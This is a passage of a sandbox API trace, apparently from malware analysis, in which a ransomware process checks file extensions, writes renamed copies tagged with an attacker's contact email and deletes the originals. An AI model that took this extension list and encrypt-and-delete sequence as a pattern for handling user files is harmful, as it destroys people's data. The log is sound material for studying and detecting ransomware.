lstrlenW (lpString=".dbf") returned 4 [0201.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.736] lstrlenW (lpString=".1cd") returned 4 [0201.736] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.736] lstrlenW (lpString=".jpg") returned 4 [0201.736] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.737] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.737] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.737] GetLastError () returned 0x0 [0201.737] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xd9a, lpOverlapped=0x0) returned 1 [0201.784] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xda0, lpOverlapped=0x0) returned 1 [0201.786] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.786] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.786] SetEndOfFile (hFile=0x390) returned 1 [0201.786] CloseHandle (hObject=0x390) returned 1 [0201.786] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.786] SetEndOfFile (hFile=0x378) returned 1 [0201.787] CloseHandle (hObject=0x378) returned 1 [0201.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217302.wmf")) returned 1 [0201.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.788] lstrlenW (lpString=".doc") returned 4 [0201.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString=".docx") returned 5 [0201.789] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0201.789] lstrlenW (lpString=".pdf") returned 4 [0201.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString=".xls") returned 4 [0201.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.789] lstrlenW (lpString=".xlsx") returned 5 [0201.789] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0201.789] lstrlenW (lpString=".ppt") returned 4 [0201.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.789] lstrlenW (lpString=".zip") returned 4 [0201.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.789] lstrlenW (lpString=".rar") returned 4 [0201.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString=".bz2") returned 4 [0201.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString=".7z") returned 3 [0201.789] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.789] lstrlenW (lpString=".dbf") returned 4 [0201.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.789] lstrlenW (lpString=".1cd") returned 4 [0201.789] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217302.WMF") returned 68 [0201.789] lstrlenW (lpString=".jpg") returned 4 [0201.789] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.790] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.790] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.791] GetLastError () returned 0x0 [0201.791] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xe2e9, lpOverlapped=0x0) returned 1 [0201.823] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xe2f0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xe2f0, lpOverlapped=0x0) returned 1 [0201.825] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.825] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.825] SetEndOfFile (hFile=0x390) returned 1 [0201.826] CloseHandle (hObject=0x390) returned 1 [0201.826] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.826] SetEndOfFile (hFile=0x378) returned 1 [0201.827] CloseHandle (hObject=0x378) returned 1 [0201.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.827] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227558.jpg")) returned 1 [0201.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.828] lstrlenW (lpString=".doc") returned 4 [0201.828] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0201.828] lstrlenW (lpString=".docx") returned 5 [0201.828] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0201.828] lstrlenW (lpString=".pdf") returned 4 [0201.828] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0201.828] lstrlenW (lpString=".xls") returned 4 [0201.828] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0201.828] lstrlenW (lpString=".xlsx") returned 5 [0201.828] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0201.828] lstrlenW (lpString=".ppt") returned 4 [0201.828] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.829] lstrlenW (lpString=".zip") returned 4 [0201.829] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0201.829] lstrlenW (lpString=".rar") returned 4 [0201.829] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0201.829] lstrlenW (lpString=".bz2") returned 4 [0201.829] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0201.829] lstrlenW (lpString=".7z") returned 3 [0201.829] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.829] lstrlenW (lpString=".dbf") returned 4 [0201.829] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.829] lstrlenW (lpString=".1cd") returned 4 [0201.829] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0201.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227558.JPG") returned 68 [0201.829] lstrlenW (lpString=".jpg") returned 4 [0201.829] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0201.830] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.830] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.831] GetLastError () returned 0x0 [0201.831] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x1daa, lpOverlapped=0x0) returned 1 [0201.911] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1db0, lpOverlapped=0x0) returned 1 [0201.912] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.912] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.912] SetEndOfFile (hFile=0x390) returned 1 [0201.912] CloseHandle (hObject=0x390) returned 1 [0201.912] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.912] SetEndOfFile (hFile=0x378) returned 1 [0201.913] CloseHandle (hObject=0x378) returned 1 [0201.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.913] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf")) returned 1 [0201.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.914] lstrlenW (lpString=".doc") returned 4 [0201.914] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.914] lstrlenW (lpString=".docx") returned 5 [0201.914] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0201.914] lstrlenW (lpString=".pdf") returned 4 [0201.914] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.914] lstrlenW (lpString=".xls") returned 4 [0201.914] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.914] lstrlenW (lpString=".xlsx") returned 5 [0201.914] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0201.914] lstrlenW (lpString=".ppt") returned 4 [0201.914] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.914] lstrlenW (lpString=".zip") returned 4 [0201.914] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.914] lstrlenW (lpString=".rar") returned 4 [0201.914] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.915] lstrlenW (lpString=".bz2") returned 4 [0201.915] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.915] lstrlenW (lpString=".7z") returned 3 [0201.915] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.915] lstrlenW (lpString=".dbf") returned 4 [0201.915] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.915] lstrlenW (lpString=".1cd") returned 4 [0201.915] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF") returned 68 [0201.915] lstrlenW (lpString=".jpg") returned 4 [0201.915] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.916] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.916] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0202.183] GetLastError () returned 0x0 [0202.183] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xa086, lpOverlapped=0x0) returned 1 [0202.236] WriteFile (in: hFile=0x364, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xa090, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xa090, lpOverlapped=0x0) returned 1 [0202.238] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.238] WriteFile (in: hFile=0x364, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0202.239] SetEndOfFile (hFile=0x364) returned 1 [0202.239] CloseHandle (hObject=0x364) returned 1 [0202.239] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.239] SetEndOfFile (hFile=0x378) returned 1 [0202.240] CloseHandle (hObject=0x378) returned 1 [0202.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0202.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232395.wmf")) returned 1 [0202.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.241] lstrlenW (lpString=".doc") returned 4 [0202.241] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0202.241] lstrlenW (lpString=".docx") returned 5 [0202.241] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0202.241] lstrlenW (lpString=".pdf") returned 4 [0202.241] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0202.241] lstrlenW (lpString=".xls") returned 4 [0202.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0202.241] lstrlenW (lpString=".xlsx") returned 5 [0202.241] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0202.241] lstrlenW (lpString=".ppt") returned 4 [0202.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0202.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.241] lstrlenW (lpString=".zip") returned 4 [0202.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.242] lstrlenW (lpString=".rar") returned 4 [0202.242] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.242] lstrlenW (lpString=".bz2") returned 4 [0202.242] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0202.242] lstrlenW (lpString=".7z") returned 3 [0202.242] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0202.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.242] lstrlenW (lpString=".dbf") returned 4 [0202.242] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.242] lstrlenW (lpString=".1cd") returned 4 [0202.242] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0202.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232395.WMF") returned 68 [0202.242] lstrlenW (lpString=".jpg") returned 4 [0202.242] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0202.242] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.242] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.242] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0202.243] GetLastError () returned 0x0 [0202.243] ReadFile (hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0) Thread: id = 90 os_tid = 0x970 [0178.025] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x73dc30 [0178.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x74dc38 [0178.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de078 [0178.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c2d0 [0178.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de090 [0178.026] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x3b06020 [0178.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde80 [0178.030] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6dde80, Size=0x20) returned 0x6beea8 [0178.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddeb0 [0178.030] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddeb0, Size=0x20) returned 0x6bef48 [0178.030] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.030] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.030] Wow64DisableWow64FsRedirection (in: OldValue=0x2fdff50 | out: OldValue=0x2fdff50*=0x0) returned 1 [0178.030] lstrlenW (lpString="kernel32.dll") returned 12 [0178.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.030] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.030] Sleep (dwMilliseconds=0x64) [0178.267] Sleep (dwMilliseconds=0x64) [0178.492] lstrcmpiW (lpString1=".LOG", lpString2=".bat") returned 1 [0178.492] lstrlenW (lpString="BCD.LOG") returned 7 [0178.492] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.492] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.492] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.492] lstrlenW (lpString=".doc") returned 4 [0178.493] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0178.493] lstrlenW (lpString=".docx") returned 5 [0178.493] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0178.493] lstrlenW (lpString=".pdf") returned 4 [0178.493] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0178.493] lstrlenW (lpString=".xls") returned 4 [0178.493] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0178.493] lstrlenW (lpString=".xlsx") returned 5 [0178.493] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0178.493] lstrlenW (lpString=".ppt") returned 4 [0178.493] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0178.493] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.493] lstrlenW (lpString=".zip") returned 4 [0178.493] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0178.493] lstrlenW (lpString=".rar") returned 4 [0178.493] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0178.493] lstrlenW (lpString=".bz2") returned 4 [0178.493] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0178.493] lstrlenW (lpString=".7z") returned 3 [0178.493] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0178.493] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.493] lstrlenW (lpString=".dbf") returned 4 [0178.493] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0178.493] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.493] lstrlenW (lpString=".1cd") returned 4 [0178.493] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0178.493] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.493] lstrlenW (lpString=".jpg") returned 4 [0178.493] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString=".doc") returned 4 [0178.494] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0178.494] lstrlenW (lpString=".docx") returned 5 [0178.494] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0178.494] lstrlenW (lpString=".pdf") returned 4 [0178.494] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0178.494] lstrlenW (lpString=".xls") returned 4 [0178.494] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0178.494] lstrlenW (lpString=".xlsx") returned 5 [0178.494] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0178.494] lstrlenW (lpString=".ppt") returned 4 [0178.494] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString=".zip") returned 4 [0178.494] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0178.494] lstrlenW (lpString=".rar") returned 4 [0178.494] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0178.494] lstrlenW (lpString=".bz2") returned 4 [0178.494] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0178.494] lstrlenW 